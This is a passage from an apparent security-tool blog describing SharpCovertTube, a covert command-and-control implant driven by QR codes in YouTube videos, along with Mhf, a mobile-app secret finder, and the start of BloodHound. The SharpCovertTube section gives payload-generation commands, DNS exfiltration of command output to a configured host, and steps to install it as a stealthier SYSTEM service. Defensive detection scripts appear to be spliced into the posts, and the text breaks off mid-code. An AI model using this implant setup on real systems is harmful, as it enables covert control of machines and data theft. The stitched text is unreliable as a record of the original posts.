href="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0"><img alt="" border="0" height="154" id="BLOGGER_PHOTO_ID_7343001709859404242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0=w640-h154" width="640" /></a></p> <p>This also works for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a> is uploaded and the content of c:\temp is exfiltrated using several DNS queries:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343001717962333954" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8=w640-h412" width="640" /></a></p> <p>Logging to a file is optional, but the folder that will hold the file must already exist on the system; the default path is "c:\temp\.sharpcoverttube.log". 
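Because the command responses travel as base64 chunks inside DNS query names, the defender's counterpart is a check over resolver logs for exactly that pattern. The following Python is an added example and is not part of SharpCovertTube or of the author's dns-exfiltration scripts; the log layout, the 40-character chunk size and the parent zone test.org (the tool's default dns_hostname) are constructed for the demonstration, and the thresholds are assumptions to tune per environment.

```python
"""Flag chunked DNS exfiltration in a resolver log and reassemble the payload.

Added example, not part of SharpCovertTube. The "timestamp client qtype qname"
log layout, the chunk size and the thresholds are constructed assumptions.
"""
import base64
import math
import re
from collections import defaultdict

# --- constructed sample input -------------------------------------------------
# One host sends a command response as base64 labels under test.org; the other
# queries are ordinary lookups that must not be flagged.
SAMPLE_RESPONSE = "dir c:\\temp\n 2024-03-06  whoami.txt\n 2024-03-06  notes.txt\n"
_B64 = base64.b64encode(SAMPLE_RESPONSE.encode()).decode().rstrip("=")
_CHUNKS = [_B64[i:i + 40] for i in range(0, len(_B64), 40)]   # assumed 40-char labels

SAMPLE_LOG = [
    "2024-03-06T10:00:01Z 10.0.0.5 A www.example.com",
    "2024-03-06T10:00:02Z 10.0.0.7 A mail.example.com",
    f"2024-03-06T10:00:02Z 10.0.0.5 A {_CHUNKS[0]}.test.org",
    "2024-03-06T10:00:03Z 10.0.0.5 A mail-relay.test.org",      # benign, same zone
    f"2024-03-06T10:00:03Z 10.0.0.5 A {_CHUNKS[1]}.test.org",
    "2024-03-06T10:00:04Z 10.0.0.7 A cdn.example.com",
]

# --- detection ----------------------------------------------------------------
B64_LABEL = re.compile(r"[A-Za-z0-9+/]+")
MIN_LABEL_LEN = 20     # assumed: shorter labels are common in benign names
MIN_ENTROPY = 3.0      # assumed: bits per character; base64 of text sits well above
MIN_HITS = 2           # assumed: one long label is not evidence, a series is


def shannon_entropy(text: str) -> float:
    """Bits per character; random base64 approaches 6, plain words sit near 4."""
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    """Split one constructed log line into (timestamp, client, qtype, qname)."""
    ts, client, qtype, qname = line.split()
    return ts, client, qtype, qname.rstrip(".")


def analyze(log_lines):
    """Return {(client, parent_zone): [candidate labels in arrival order]} for
    every client/zone pair whose queries look like a chunked upload."""
    labels_by_pair = defaultdict(list)
    for line in log_lines:
        _, client, _, qname = parse_line(line)
        labels = qname.split(".")
        if len(labels) < 3:
            continue                               # bare zone, nothing carries data
        parent = ".".join(labels[-2:]).lower()
        labels_by_pair[(client, parent)].extend(labels[:-2])
    flagged = {}
    for pair, labels in labels_by_pair.items():
        hits = [lab for lab in labels
                if len(lab) >= MIN_LABEL_LEN and B64_LABEL.fullmatch(lab)
                and shannon_entropy(lab) >= MIN_ENTROPY]
        if len(hits) >= MIN_HITS:
            # keep every base64-shaped label, including a short final chunk
            flagged[pair] = [lab for lab in labels if B64_LABEL.fullmatch(lab)]
    return flagged


def reassemble(labels) -> str:
    """Join the chunks in arrival order and restore the padding the sender dropped."""
    blob = "".join(labels)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


if __name__ == "__main__":
    for (client, zone), chunks in analyze(SAMPLE_LOG).items():
        print(f"[!] {client} -> *.{zone}: {len(chunks)} chunk(s)")
        print(reassemble(chunks))
```

Grouping by client and parent zone rather than judging single queries is what separates an upload from an occasional long CDN label: a series of high-entropy labels to one zone from one host is the signal. Reassembly assumes the chunks arrive in order, which holds in the constructed log; real resolvers may retry or reorder, so treat the decoded text as a best-effort view and keep the raw queries as evidence.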
DNS exfiltration is also optional and can be tested using Burp's collaborator:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo"><img alt="" border="0" height="108" id="BLOGGER_PHOTO_ID_7343001721497621394" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo=w640-h108" width="640" /></a></p> <p>As an alternative, I created <a href="https://github.com/ricardojoserf/dns-exfiltration" rel="nofollow" target="_blank" title="this repository">this repository</a> with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.</p> <br /><span style="font-size: large;"><b>Configuration</b></span><br /> <p>There are some values you can change; they are in the Configuration.cs file for the <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube/Configuration.cs" rel="nofollow" target="_blank" title="regular binary">regular binary</a> and <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube_Service/Configuration.cs" rel="nofollow" target="_blank" title="the service binary">the service binary</a>. 
Only the first two have to be updated:</p> <ul> <li><strong>channel_id</strong> (Mandatory!!!): Get your Youtube channel ID from <a href="https://www.youtube.com/account_advanced" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>api_key</strong> (Mandatory!!!): To get the API key, create an application and generate the key from <a href="https://console.cloud.google.com/apis/credentials" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>payload_aes_key</strong> (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-character string.</li> <li><strong>payload_aes_iv</strong> (Optional. Default: "0000000000000000"): AES IV for decrypting QR codes (if using AES). It must be a 16-character string.</li> <li><strong>seconds_delay</strong> (Optional. Default: 600): Seconds to wait between checks for a new video. If the value is low you will exceed the API rate limit.</li> <li><strong>debug_console</strong> (Optional. Default: true): Show debug messages in the console or not.</li> <li><strong>log_to_file</strong> (Optional. Default: true): Write debug messages to the log file or not.</li> <li><strong>log_file</strong> (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.</li> <li><strong>dns_exfiltration</strong> (Optional. Default: true): Exfiltrate command responses through DNS or not.</li> <li><strong>dns_hostname</strong> (Optional. 
Default: ".test.org"): DNS hostname used to exfiltrate the responses of commands executed on the system.</li> </ul> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80"><img alt="" border="0" height="294" id="BLOGGER_PHOTO_ID_7343001728956714658" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80=w640-h294" width="640" /></a></p> <br /><span style="font-size: large;"><b>Generating videos with QR codes</b></span><br /> <p>You can generate the videos from Windows using Python 3. For that, first install the dependencies:</p> <pre><code>pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus<br /></code></pre> <p>Then run the generate_video.py script:</p> <pre><code>python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]<br /></code></pre> <ul> <li> <p>TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.</p> </li> <li> <p>FILE (-f) is the path where the video is generated.</p> </li> <li> <p>COMMAND (-c) is the command to execute in the system.</p> </li> <li> <p>AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in the Program.cs file in SharpCovertTube.</p> </li> <li> <p>AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in the Program.cs file in SharpCovertTube. 
</p> </li> </ul> <br /><b>Examples</b><br /> <p>Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:</p> <pre><code>python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami<br /></code></pre> <p>Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:</p> <pre><code>python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA"><img alt="" border="0" height="96" id="BLOGGER_PHOTO_ID_7343001729862797778" src="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA=w640-h96" width="640" /></a></p> <br /><span style="font-size: large;"><b>Running it as a service</b></span><br /> <p>You can find the code to run it as a service in the <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/SharpCovertTube_Service" rel="nofollow" target="_blank" title="SharpCovertTube_Service folder">SharpCovertTube_Service folder</a>. 
It has the same functionalities except self-deletion, which would not make sense in this case.</p> <p>It is possible to install it with InstallUtil; it is prepared to run as the SYSTEM user, so you need to install it as administrator:</p> <pre><code>InstallUtil.exe SharpCovertTube_Service.exe<br /></code></pre> <p>You can then start it with:</p> <pre><code>net start "SharpCovertTube Service"<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0"><img alt="" border="0" height="162" id="BLOGGER_PHOTO_ID_7343001741526346914" src="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0=w640-h162" width="640" /></a></p> <p>If you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). 
If you do not have those privileges you cannot install services, so you can only use the ordinary binary.</p> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li> <p><strong>The file must be 64-bit!!!</strong> This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's <a href="https://github.com/Stefangansevles/QR-Capture" rel="nofollow" target="_blank" title="QR-Capture">QR-Capture</a> project, who borrowed part of it from Uzi Granot's <a href="https://github.com/Uzi-Granot/QRCode" rel="nofollow" target="_blank" title="QRCode">QRCode</a> project, who at the same time borrowed part of it from Zakhar Semenov's <a href="https://github.com/free5lot/Camera_Net" rel="nofollow" target="_blank" title="Camera_Net">Camera_Net</a> project (then I lost track). So thanks to all of them!</p> </li> <li> <p>This project is a port of <a href="https://github.com/ricardojoserf/covert-tube" rel="nofollow" target="_blank" title="covert-tube">covert-tube</a>, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about the <a href="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" rel="nofollow" target="_blank" title="Casbaneiro">Casbaneiro</a> and <a href="https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" rel="nofollow" target="_blank" title="Numando">Numando</a> malware.</p> </li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ricardojoserf/SharpCovertTube" rel="nofollow" target="_blank" title="Download SharpCovertTube">Download SharpCovertTube</a></span></b></div><hr /><p>Published 2024-03-05</p><span style="font-size: x-large;"><b>Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application</b></span><br /><div 
class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640" /></a></div><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.</p><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br /><span style="font-size: large;"><b>Example</b></span><br /> <br /><b>Cordova</b><br /> <p>Search files:</p> <pre><code>index.html<br />cordova.js<br />cordova_plugins.js<br /></code></pre> <br /><b>React Native Android & iOS</b><br /> <p>Search files:</p> <pre><code>Android files:<br /><br />libreactnativejni.so<br />index.android.bundle<br /><br />iOS files:<br /><br />main.jsbundle<br /></code></pre> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>❗A minimum of Java 8 is required to run Apktool. 
</p> <p><code>pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br /><b>Examples</b><br /> <pre><code>python3 mobile_helper_framework.py file.apk<br /><br />[+] App was written in React Native<br /><br />Do you want analizy the application (y/n) y<br /><br />Output directory already exists. Skipping decompilation.<br /><br />Beauty the react code? (y/n) n<br /><br />Search any info? (y/n) y<br /><br />==>>Searching possible internal IPs in the file<br /><br />results.........<br /><br />==>>Searching possible emails in the file<br /><br />results.........<br /><br />==>>Searching possible interesting words in the file<br /><br />results.........<br /><br />==>>Searching Private Keys in the file<br /><br />results.........<br /><br />==>>Searching high confidential secrets<br /><br />results.........<br /><br />==>>Searching possible sensitive URLs in js files<br /><br />results.........<br /><br />==>>Searching possible endpoints in js files<br /><br />results.........<br /></code></pre> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. 
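The file-marker approach described above can be applied directly to an archive listing, before any decompilation, and the listings of a base APK and its split_config.*.apk files can be merged so a marker that lives in the native-library split is not missed. The following Python is an added example, not mhf's own code: the marker names are those from the Cordova and React Native search lists plus libflutter.so from the split-APK note, Xamarin is left out because the post names no marker for it, and the sample archives are constructed in memory so the script runs offline.

```python
"""Fingerprint a mobile app's framework from its archive listing.

Added example, not mhf's own code. Marker files come from the Cordova and
React Native search lists plus libflutter.so from the split-APK note; the
sample archives are constructed in memory.
"""
import io
import zipfile

MARKERS = {
    "Cordova": ("cordova.js", "cordova_plugins.js", "index.html"),
    "React Native": ("libreactnativejni.so", "index.android.bundle", "main.jsbundle"),
    "Flutter": ("libflutter.so",),
}
# index.html alone proves nothing (any WebView app ships one), so it only
# counts when a decisive marker of the same framework is present too.
WEAK_MARKERS = {"index.html"}


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def detect_framework(member_names):
    """Return (framework, matching member paths); ("Unknown", []) without a decisive hit."""
    by_base = {}
    for name in member_names:
        by_base.setdefault(_basename(name), []).append(name)
    best = ("Unknown", [])
    for framework, markers in MARKERS.items():
        hits = [p for m in markers for p in by_base.get(m, [])]
        decisive = any(_basename(p) not in WEAK_MARKERS for p in hits)
        if decisive and len(hits) > len(best[1]):
            best = (framework, hits)
    return best


def detect_in_archives(archives):
    """Merge the listings of several archives (base APK plus split_config.*.apk,
    or a single .ipa, which is already a zip) and fingerprint the union."""
    names = []
    for archive in archives:
        with zipfile.ZipFile(archive) as zf:
            names.extend(zf.namelist())
    return detect_framework(names)


def build_sample(members):
    """Constructed in-memory archive whose members hold placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member in members:
            zf.writestr(member, b"constructed placeholder")
    buf.seek(0)
    return buf


# Constructed samples: a React Native base APK whose JNI library sits in the
# ABI split, an IPA, a Flutter ABI split, a plain WebView app and a Cordova app.
SAMPLE_RN_BASE = build_sample(["AndroidManifest.xml", "classes.dex", "assets/index.android.bundle"])
SAMPLE_RN_SPLIT = build_sample(["lib/arm64-v8a/libreactnativejni.so"])
SAMPLE_IPA = build_sample(["Payload/Demo.app/Info.plist", "Payload/Demo.app/main.jsbundle"])
SAMPLE_FLUTTER_SPLIT = build_sample(["lib/arm64-v8a/libflutter.so"])
SAMPLE_WEBVIEW = build_sample(["AndroidManifest.xml", "classes.dex", "assets/index.html"])
SAMPLE_CORDOVA = build_sample(["assets/www/index.html", "assets/www/cordova.js",
                               "assets/www/cordova_plugins.js"])

if __name__ == "__main__":
    cases = [("RN base + ABI split", [SAMPLE_RN_BASE, SAMPLE_RN_SPLIT]),
             ("IPA", [SAMPLE_IPA]), ("Flutter ABI split", [SAMPLE_FLUTTER_SPLIT]),
             ("WebView only", [SAMPLE_WEBVIEW]), ("Cordova", [SAMPLE_CORDOVA])]
    for label, archives in cases:
        print(f"{label:20} -> {detect_in_archives(archives)}")
```

For real files, pass paths instead of the BytesIO objects, for example <code>detect_in_archives(["base.apk", "split_config.arm64_v8a.apk"])</code> or <code>detect_in_archives(["app.ipa"])</code>; an .ipa is already a zip, so the rename step mhf performs is not needed just to read the listing.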
</p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">✅</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> </tr> <tr> <td align="center">Detect if JS files 
are encrypted</td> <td></td> <td align="right">❌</td> <td align="right"></td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed</td> <td></td> <td align="right">❌</td> <td align="right">Hermes✅</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">XALZ✅</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> </tbody></table> <p><code>What is patching APK:</code> This tool uses reFlutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps by swapping in a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr /> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and let users download and use only the parts of the application they need.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application, such as resources, code libraries, assets and configuration files.</p> <pre><code>adb shell pm path com.package<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk<br /></code></pre> <p>For example, if a Flutter application is installed as split APKs, the file that has to be patched is <code>split_config.arm64_v8a.apk</code> (the ABI split for an arm64 device), because that split, not <code>base.apk</code>, contains <code>libflutter.so</code>.</p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> 
<li>This tool uses the secrets-patterns-db repository created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool uses a regular expression created by <a href="https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" target="_blank" title="Gerben_Javado">Gerben_Javado</a> (LinkFinder) to extract endpoints</li> <li>This tool uses <a href="https://www.kitploit.com/search/label/reFlutter" target="_blank" title="reflutter">reFlutter</a> for Flutter actions</li> </ul> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>0.5</b><br /> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br /><b>0.4</b><br /> <ul> <li>Added plugin information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br /><b>0.3</b><br /> <ul> <li>Added NativeScript app detection</li> <li>Added a signing option for when the APK extracted from an AAB file is not signed</li> </ul> <br /><b>0.2</b><br /> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br /><b>0.1</b><br /> <ul> <li>Initial version release.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download 
Mhf</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77861886549037308932024-03-04T08:30:00.001-03:002024-03-04T08:30:00.134-03:00BloodHound - Six Degrees Of Domain Admin<p></p><p></p><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640" /></a></p><p align="center"><br /></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. 
It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. 
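</p> <p>The graph-search idea above, shown as an added example that is not BloodHound's own code: a constructed edge list in BloodHound's relationship vocabulary (MemberOf, AdminTo, HasSession) over made-up principals, and a breadth-first search that returns the shortest chain of hops from a low-privilege user to the Domain Admins group, or reports that no chain exists. The object names and edges are assumptions for illustration only.</p>

```python
"""Added example, not BloodHound's code: attack paths as shortest paths in a
directed graph of AD relationships. The graph below is constructed."""
from collections import deque

# Constructed edge list: (source, relationship, target). Relationship names
# follow BloodHound's vocabulary, but every principal and edge here is made up.
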